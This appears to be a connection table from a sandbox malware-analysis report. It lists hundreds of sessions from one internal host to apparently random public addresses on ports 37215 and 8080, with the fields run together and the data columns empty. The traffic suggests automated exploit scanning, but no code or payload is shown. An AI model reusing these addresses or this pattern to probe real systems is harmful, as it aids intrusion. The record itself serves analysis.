                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35045192.168.2.233742660.41.173.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35046192.168.2.2346116157.254.76.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35047192.168.2.233410241.106.33.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35048192.168.2.2340490204.22.201.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35049192.168.2.2341556197.161.98.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35050192.168.2.2349544157.19.91.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35051192.168.2.2352938197.18.13.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35052192.168.2.2360634159.37.21.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35053192.168.2.2333302157.137.188.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35054192.168.2.2348236157.19.125.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35055192.168.2.2345586101.145.237.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35056192.168.2.2337408157.243.243.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35057192.168.2.2360886157.86.84.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35058192.168.2.2346818106.106.100.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35059192.168.2.234625041.22.38.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35060192.168.2.2338540157.146.171.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35061192.168.2.2351090146.236.160.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35062192.168.2.2341074197.54.128.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35063192.168.2.233573672.85.166.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35064192.168.2.2357000157.234.111.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35065192.168.2.2339580157.145.30.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35066192.168.2.233825440.38.110.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35067192.168.2.2347800197.113.129.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35068192.168.2.235414041.254.0.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35069192.168.2.2334744197.227.94.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35070192.168.2.235804441.28.142.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35071192.168.2.2357844157.251.11.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35072192.168.2.2356126197.134.89.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35073192.168.2.234131263.44.105.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35074192.168.2.23545521.169.230.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35075192.168.2.2351964213.250.127.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35076192.168.2.2342994185.90.235.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35077192.168.2.2359830193.139.22.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35078192.168.2.2341024154.252.254.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35079192.168.2.2351216162.153.209.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35080192.168.2.2355024146.11.84.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35081192.168.2.2334496138.217.60.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35082192.168.2.2357750117.199.160.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35083192.168.2.235807812.25.108.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35084192.168.2.2344396105.57.190.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35085192.168.2.2359398109.67.146.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35086192.168.2.2360716186.225.50.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35087192.168.2.2357066156.207.41.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35088192.168.2.2358174153.232.22.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35089192.168.2.2346572135.61.176.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35090192.168.2.2350590191.32.112.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35091192.168.2.2350392219.237.124.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35092192.168.2.234120071.68.149.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35093192.168.2.2352808109.19.174.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35094192.168.2.233286832.71.36.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35095192.168.2.2345962192.122.58.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35096192.168.2.2335212206.81.69.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35097192.168.2.234249224.30.222.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35098192.168.2.2339034183.98.248.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35099192.168.2.2344842199.193.23.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35100192.168.2.2339366132.141.38.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35101192.168.2.233300648.203.193.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35102192.168.2.2359156202.35.250.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35103192.168.2.2346766163.252.28.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35104192.168.2.2356888124.106.93.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35105192.168.2.234765824.235.22.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35106192.168.2.2355632138.222.158.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35107192.168.2.2359780118.245.183.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35108192.168.2.233995263.97.252.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35109192.168.2.234069479.80.97.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35110192.168.2.235732041.92.73.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35111192.168.2.2360616219.184.4.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35112192.168.2.2354028147.120.4.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35113192.168.2.233905819.93.144.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35114192.168.2.2354908202.90.135.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35115192.168.2.2337774172.150.51.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35116192.168.2.235553278.152.29.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35117192.168.2.233719678.33.101.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35118192.168.2.2338414121.211.74.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35119192.168.2.235879235.82.184.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35120192.168.2.2351692216.28.61.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35121192.168.2.2336832141.113.106.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35122192.168.2.2343520177.171.65.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35123192.168.2.2350318204.245.22.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35124192.168.2.235895440.115.93.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35125192.168.2.234988275.119.25.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35126192.168.2.234551079.224.111.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35127192.168.2.2356206113.27.54.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35128192.168.2.236044818.145.193.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35129192.168.2.2357986159.122.38.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35130192.168.2.2343916101.141.17.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35131192.168.2.235836619.7.158.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35132192.168.2.234066258.59.89.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35133192.168.2.2339994177.45.173.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35134192.168.2.235314250.124.153.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35135192.168.2.23410069.42.236.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35136192.168.2.233477072.2.196.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35137192.168.2.2339658163.203.245.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35138192.168.2.2350090133.133.160.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35139192.168.2.2349840170.95.212.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35140192.168.2.234097043.151.203.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35141192.168.2.2359614155.120.22.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35142192.168.2.233825454.24.149.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35143192.168.2.233971077.94.170.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35144192.168.2.234656634.3.238.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35145192.168.2.234079867.223.171.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35146192.168.2.2344462212.82.164.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35147192.168.2.233563038.219.179.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35148192.168.2.2347014167.130.25.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35149192.168.2.2350030152.48.147.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35150192.168.2.2344438178.214.51.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35151192.168.2.235204076.210.76.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35152192.168.2.2351834115.150.110.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35153192.168.2.233749465.131.89.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35154192.168.2.235492837.114.214.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35155192.168.2.2354748197.31.73.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35156192.168.2.2335618159.210.127.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35157192.168.2.235251042.1.238.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35158192.168.2.235725475.251.175.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35159192.168.2.2338954186.201.171.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35160192.168.2.2339506112.73.9.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35161192.168.2.2352554206.22.118.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35162192.168.2.233883832.73.3.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35163192.168.2.235929677.190.216.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35164192.168.2.236036060.52.223.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35165192.168.2.233479866.70.82.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35166192.168.2.235424078.157.9.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35167192.168.2.2339648145.208.69.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35168192.168.2.235383840.218.170.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35169192.168.2.234612081.201.180.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35170192.168.2.234834478.155.171.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35171192.168.2.233764417.55.167.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35172192.168.2.2334006188.106.35.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35173192.168.2.2349496188.165.185.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35174192.168.2.23452388.99.134.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35175192.168.2.234614261.242.238.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35176192.168.2.2344386223.245.82.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35177192.168.2.2349526189.135.165.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35178192.168.2.235124418.215.22.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35179192.168.2.234467042.214.15.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35180192.168.2.235671654.95.146.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35181192.168.2.235705080.41.188.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35182192.168.2.233956259.186.31.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35183192.168.2.233983695.108.161.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35184192.168.2.234584423.243.207.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35185192.168.2.234080819.216.227.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35186192.168.2.2338678114.17.202.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35187192.168.2.2344424146.42.82.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35188192.168.2.2356796134.183.147.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35189192.168.2.2350796191.31.200.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35190192.168.2.2333112189.185.118.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35191192.168.2.2340690180.24.173.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192192.168.2.23518062.215.229.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35193192.168.2.233753260.108.25.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35194192.168.2.2355134134.6.222.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35195192.168.2.2359054113.234.207.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35196192.168.2.2338750184.88.201.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35197192.168.2.2343452117.191.192.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35198192.168.2.234704885.160.189.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35199192.168.2.2348222124.118.20.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35200192.168.2.235241093.39.144.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35201192.168.2.233789482.98.120.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35202192.168.2.234965831.225.80.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35203192.168.2.2336778157.31.9.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35204192.168.2.2353418169.38.208.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35205192.168.2.2338764112.163.230.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35206192.168.2.234768238.166.108.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35207192.168.2.2343600161.163.92.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35208192.168.2.234224498.200.1.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35209192.168.2.2336374164.164.28.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35210192.168.2.2353510103.131.6.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35211192.168.2.2338036202.114.197.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35212192.168.2.2358326148.125.134.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35213192.168.2.2348292191.78.219.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35214192.168.2.2349224208.240.6.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35215192.168.2.2345996188.134.120.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35216192.168.2.2341452154.132.171.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35217192.168.2.234884012.150.30.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35218192.168.2.2349426114.111.146.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35219192.168.2.2336160212.161.235.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35220192.168.2.234183673.206.183.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35221192.168.2.234210859.187.201.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35222192.168.2.2348284156.61.248.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35223192.168.2.2334162108.134.69.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35224192.168.2.2336716138.19.150.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35225192.168.2.2354748163.55.75.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35226192.168.2.23561284.194.118.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35227192.168.2.23456769.20.186.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35228192.168.2.2345516188.203.113.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35229192.168.2.2355714125.59.64.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35230192.168.2.2336000174.131.127.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35231192.168.2.2355906166.96.254.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35232192.168.2.233931851.142.62.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35233192.168.2.2360420156.138.102.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35234192.168.2.234673678.11.205.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35235192.168.2.2353326190.17.40.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35236192.168.2.233441247.33.190.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35237192.168.2.233941257.175.162.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35238192.168.2.236080493.85.85.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35239192.168.2.2355842129.78.157.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35240192.168.2.2358542102.200.190.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35241192.168.2.234656073.158.204.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35242192.168.2.235021241.116.188.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35243192.168.2.2336796157.193.152.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35244192.168.2.2353574197.173.4.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35245192.168.2.2350022120.241.164.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35246192.168.2.2341706197.145.159.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35247192.168.2.233539890.211.76.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35248192.168.2.235557041.77.139.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35249192.168.2.2347768197.131.232.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35250192.168.2.235995668.85.160.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35251192.168.2.2350816117.113.192.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35252192.168.2.233921664.216.202.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35253192.168.2.2358118161.229.110.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35254192.168.2.2358108193.246.136.1628080
                                                        TimestampBytes transferredDirectionData


